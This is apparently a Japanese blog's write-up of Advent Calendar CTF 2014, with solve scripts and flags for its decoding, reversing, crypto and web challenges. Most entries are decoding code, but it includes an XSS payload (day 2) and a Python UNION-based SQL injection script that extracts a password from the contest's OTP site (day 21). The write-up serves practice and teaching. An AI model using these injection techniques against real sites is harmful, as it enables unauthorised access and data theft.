st98 の日記帳


[ctf] Advent Calendar CTF 2014 の write-up

ぼっチーム omakase として参加した。最終的に獲得できたポイントは 173 点でチーム順位は 24 位 (505 チーム中) だった。
1 ~ 14 日目、21 ~ 22 日目、25 日目の問題を解いた。

1 日目 warmup (misc)

'0x41444354465f57334c43304d335f37305f414443374632303134'.match(/[0-9a-f]{2}/g).map(function(c){return String.fromCharCode(parseInt(c, 16))}).join('');
flag: ADCTF_W3LC0M3_70_ADC7F2014

# Python 3
import codecs
codecs.decode('41444354465f57334c43304d335f37305f414443374632303134', 'hex') # b'ADCTF_W3LC0M3_70_ADC7F2014'

# Python 2
'41444354465f57334c43304d335f37305f414443374632303134'.decode('hex') # 'ADCTF_W3LC0M3_70_ADC7F2014'

2 日目 alert man (web)

      f = 0;
      cs = [5010175210, 5010175222, 5010175227, 5010175166, 5010175224, 5010175218, 5010175231, 5010175225, 5010175166, 5010175223, 5010175213, 5010175140, 5010175166, 5010175199, 5010175194, 5010175197, 5010175178, 5010175192, 5010175169, 5010175191, 5010175169, 5010175146, 5010175187, 5010175169, 5010175146, 5010175218, 5010175149, 5010175180, 5010175210, 5010175169, 5010175187, 5010175146, 5010175216];
      t = '';
      for (i = 0; i < cs.length; i++) {
        t += String.fromCharCode(cs[i] ^ 0x123456789 + 123456789)
      }
      appendTweet('<b>' + t + '</b>')
f = 1;
alert('XSS');
flag: ADCTF_I_4M_4l3Rt_M4n

<img src=_ onerror=alert(/XSS/.source)>

3 日目 listen (misc)

flag: ADCTF_SOUNDS_GOOD

4 日目 easyone (binary)

var s = 'movb   $0x37,-0x2a(%rbp)\n\
...
movb   $0x44,-0x2f(%rbp)'.split('\n');

s = s.map(function (s) {
  return [
    String.fromCharCode(parseInt(s.match(/\$0x([0-9a-f]{2})/)[1], 16)),
    parseInt(s.match(/-0x([0-9a-f]{2})/)[1], 16)
  ];
});

console.log(s.sort(function (a, b) {
  if (a[1] > b[1]) {
    return -1;
  }

  return a[1] != b[1];
}).map(function (a) {
  return a[0];
}).join(''));
flag: ADCTF_7H15_15_7oO_345y_FOR_M3

5 日目 shooting (web)

alert = console.log.bind(console); // bind しないと Illegal invocation で怒られます…
Sprite.prototype.intersect = function () { return true; };
Sprite.prototype.within = function () { return false; };
flag: ADCTF_1mP05518L3_STG

var b, c, e, s = '';
b = ["\x63", "\x68", "\x65", "\x65", "\x72", "\x75", "\x70", "\x2c", "\x20", "\x6b", "\x65", "\x65", "\x70", "\x20", "\x67", "\x6f", "\x69", "\x6e", "\x67", "\x21"];
c = [107.4, 126.1, 131.2, 120.3, 130, 134.2, 129.1, 62.4, 55.5, 126.3, 133.3, 111.2, 120.2, 43.1, 122.3, 139.4, 123.5, 126, 123.6, 47.6, 19, 18.7, 18.8, 17.1, 20.6, 19.9, 17.9, 20.4, 17.5, 20.7, 20.2, 20.2];

for (e = 0; e < b.length; e++) {
  c[e] -= b[e].charCodeAt(0);
  c[e] = Math.round(c[e] * 10) / 10;
}

for (e = 0; e < 20; e++) {
  s += String.fromCharCode(c[e ^ b.length] * 10 ^ 255);
}

console.log(s); // "ADCTF_1mP05518L3_STG"

6 日目 paths (reversing)

flag: ADCTF_G0_go_5hOr7E57_PaTh

7 日目 reader (PPC)

import re
import socket
import sys

def split(s, n):
  return re.findall(r'.{' + str(n) + r'}|.+', s)

def decode(s):
  # http://www.n-barcode.com/shurui/code-93.html
  s = split(s, 9)
  r = ''
  for x in s[1:-4]:
    r += {
      '100010100': '0',
      '101001000': '1',
      '101000100': '2',
      '101000010': '3',
      '100101000': '4',
      '100100100': '5',
      '100100010': '6',
      '101010000': '7',
      '100010010': '8',
      '100001010': '9',
      '110101000': 'A',
      '110100100': 'B',
      '110100010': 'C',
      '110010100': 'D',
      '110010010': 'E',
      '110001010': 'F',
      '101101000': 'G',
      '101100100': 'H',
      '101100010': 'I',
      '100110100': 'J',
      '100011010': 'K',
      '101011000': 'L',
      '101001100': 'M',
      '101000110': 'N',
      '100101100': 'O',
      '100010110': 'P',
      '110110100': 'Q',
      '110110010': 'R',
      '110101100': 'S',
      '110100110': 'T',
      '110010110': 'U',
      '110011010': 'V',
      '101101100': 'W',
      '101100110': 'X',
      '100110110': 'Y',
      '100111010': 'Z',
      '100101110': '-',
      '111010100': '.',
      '111010010': ' '
    }.get(x, '*')
  return r

def to_b(s):
  m = re.findall(rb'\xe2\x96[\x88\x8c\x90]| +', s)
  return ''.join([{
    b'\xe2\x96\x88': '11',
    b'\xe2\x96\x8c': '10',
    b'\xe2\x96\x90': '01'
  }.get(x, x.decode('utf-8').replace(' ', '0')) for x in m])

def main(host='adctf2014.katsudon.org', port=43010):
  sock = socket.create_connection((host, port), 3)
  sock.settimeout(3)

  while True:
    r = sock.recv(1024)
    if b'\n' not in r:
      r += sock.recv(1024)
    print('[*]', r)

    s = to_b(r[:-1])
    print('[*]', s)
    print('[*]', decode(s))

    sock.send(decode(s).encode() + b'\n')

    i = input()
    if 'q' in i:
      break

  sock.close()

if __name__ == '__main__':
  main(*sys.argv[1:])
flag: ADCTF_4R3_y0U_B4rC0d3_R34D3r

8 日目 rotate (crypto)

import subprocess
for x in range(360):
  subprocess.call('python279 rotate.py jpeg')
  if open('jpeg.enc', 'rb').read().startswith(b'\xa8\x5d\x08\x42'):
    print('[*]', x)
    break
import math
import struct

def split(l, n):
  return [l[x:x + n] for x in range(0, len(l), n)]

p = lambda x: struct.pack('b', round(x))
u = lambda x: struct.unpack('f', x)[0]

d = open('flag.jpg.enc', 'rb').read()
d = [u(x) for x in split(d, 4)]

key = math.radians(-123)
f = open('flag.jpg'.format(key), 'wb')
for i in range(0, len(d), 2):
  x, y = d[i], d[i + 1]
  f.write(p(x * math.cos(key) - y * math.sin(key)) + \
          p(x * math.sin(key) + y * math.cos(key)))
flag: ADCTF_TR0t4T3_f4C3

9 日目 qrgarden (PPC)

from PIL import Image

p = 'images/{:04x}.png'
im = Image.open('qrgarden.png')

for x in range(100):
  for y in range(100):
    o = Image.new('RGB', (87, 87))
    o.paste(im.crop((x * 87, y * 87, (x + 1) * 87, (y + 1) * 87)), (0, 0))
    o.save(p.format(x + 100 * y))
from PIL import Image

for n in range(100 * 100):
  s = ''
  im = Image.open('images/{:04x}.png'.format(n))

  for y in range(29):
    for x in range(29):
      s += 'X' if im.getpixel((x * 3, y * 3)) == (0, 0, 0) else '_'
    s += '\n'

  open('txt/{:04x}.txt'.format(n), 'w').write(s)
import subprocess

for n in range(100 * 100):
  print('[*]', n)
  s = subprocess.check_output(['python279', 'strong-qr-decoder/sqrd.py', 'txt/{:04x}.txt'.format(n)])
  if s.startswith(b'ADCTF_'):
    print(s)
    break
flag: ADCTF_re4d1n9_Qrc0de_15_FuN

10 日目 xor (crypto)

function f(a) {
  var i;
  a = a.slice();

  for (i = 0; i < a.length; i++) {
    if (i > 0) a[i] ^= a[i - 1];
    a[i] ^= a[i] >> 4;
    a[i] ^= a[i] >> 3;
    a[i] ^= a[i] >> 2;
    a[i] ^= a[i] >> 1;
  }

  return a;
}
var i, s, a;

function g(a, n) {
  for (;n--;) {
    a = f(a);
  }
  return a;
}

a = '712249146f241d31651a504a1a7372384d173f7f790c2b115f47'.match(/[0-9a-f]{2}/g).map(function (s) {
  return parseInt(s, 16);
});

for (i = 0; i < 50; i++) {
  s = String.fromCharCode.apply(null, g(a, i));
  if (s.startsWith('ADCTF_')) {
    console.log(s);
  }
}
flag: ADCTF_51mpl3_X0R_R3v3r51n6

11 日目 blacklist (web)

flag: ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT

12 日目 bruteforce (reversing)

flag: ADCTF_179424673

13 日目 loginpage (web)

flag: ADCTF_L0v3ry_p3rl_c0N73x7

14 日目 secret table (web)

flag: ADCTF_ERR0r_hELP5_8L1nd_5Ql1

21 日目 otp (web)

import re
import requests

url = 'http://otp.adctf2014.katsudon.org/'
q = "' and 0 union select pass from (select '' as token, '' as pass, '' as _ union select * from otp) where token = '{}';--"
def main():
  c = requests.get(url).content.decode('ascii')
  token = re.findall(r'[0-9a-f]{16}', c)[0]
  c = requests.post(url, {
    'token': q.format(token),
    'pass': ''
  }).content.decode('ascii')
  password = re.findall(r'[0-9a-f]{32}', c)[0]
  c = requests.post(url, {
    'token': token,
    'pass': password
  }).content.decode('ascii')
  print('[*]', re.findall(r'(the flag is: [^<]+)', c)[0])

if __name__ == '__main__':
  main()
flag: ADCTF_all_Y0ur_5CH3ma_ar3_83L0N9_t0_u5

22 日目 wtfregexp (reversing)

var _slice = Array.prototype.slice;
var s = document.body.innerText.replace(/(\[01])+/g, function (m) {
  return '.{' + String(m.length / 4) + '}';
}).slice(1, -1);

s = s.split(',').map(function (e) {
  // '(?:.{134}(?:1.{98}|.{98}0).{23})'.match(/…/); => ["(?:.{134}(?:1.{98}|.{98}0).{23})", "134", "1", "98", "0"]
  // '(?:(?:0.{72}|.{72}1).{183})' => ["(?:(?:0.{72}|.{72}1).{183})", undefined, "0", "72", "1"]
  // '(?:.{256})'.match(/…/); => ["(?:.{256})", "256", undefined, undefined, undefined]
  return _slice.call(e.match(/\(\?:(?:\.\{(\d+)\})?(?:\(\?:([01])\.\{(\d+)}\|\.\{\d+}([01])\))?(?:\.\{\d+})?\)/), 1);
});

var r = [];
s.forEach(function (e) {
  // (?:a|b)
  var a, b;

  if (e[0] === '256') {
    return;
  }

  if (e[0] == null) {
    e[0] = 0;
  }

  e = e.map(function (n) {
    return parseInt(n, 10);
  });

  a = { used: false, isSolution: null, index: e[0], value: e[1] };
  b = { used: false, isSolution: null, index: e[0] + e[2], pair: a, value: e[3] };

  a.pair = b;

  if (r[a.index] == null) {
    r[a.index] = [];
  }
  r[a.index].push(a);

  if (r[b.index] == null) {
    r[b.index] = [];
  }
  r[b.index].push(b);
});

var i;
for (i = 0; i < r.length; i += 8) {
  r[i].forEach(function (e) {
    e.used = true;
    e.isSolution = e.value === 0;
    e.pair.used = true;
    e.pair.isSolution = e.value !== 0;
  });
}

function g(a) {
  var i, v;
  for (i = 0; i < a.length; i++) {
    if (a[i].used) {
      v = a[i].isSolution ? a[i].value : +!a[i].value;
      break;
    }
  }

  if (v == null) {
    return;
  }

  for (i = 0; i < a.length; i++) {
    if (!a[i].used) {
      a[i].used = true;
      a[i].isSolution = a[i].value === v;
      a[i].pair.used = true;
      a[i].pair.isSolution = a[i].value !== v;
    }
  }
}

for (i = 0; i < r.length; i++) {
  g(r[i]);
}

r.map(function (e) {
  return e.filter(function (a) {
    return a.isSolution;
  })[0];
}).map(function (c) {
  return c === undefined ? 0 : c.value;
}).join('').match(/.{8}/g).map(function (n) {
  return String.fromCharCode(parseInt(n, 2));
}).join(''); // => 'ADCTF_l091C4L_r39Ul4r_3xpR3ss10N'
flag: ADCTF_l091C4L_r39Ul4r_3xpR3ss10N

25 日目 xmas (bonus)

flag: ADCTF_m3RRy_ChR157m42
st98.github.io / st98 の日記帳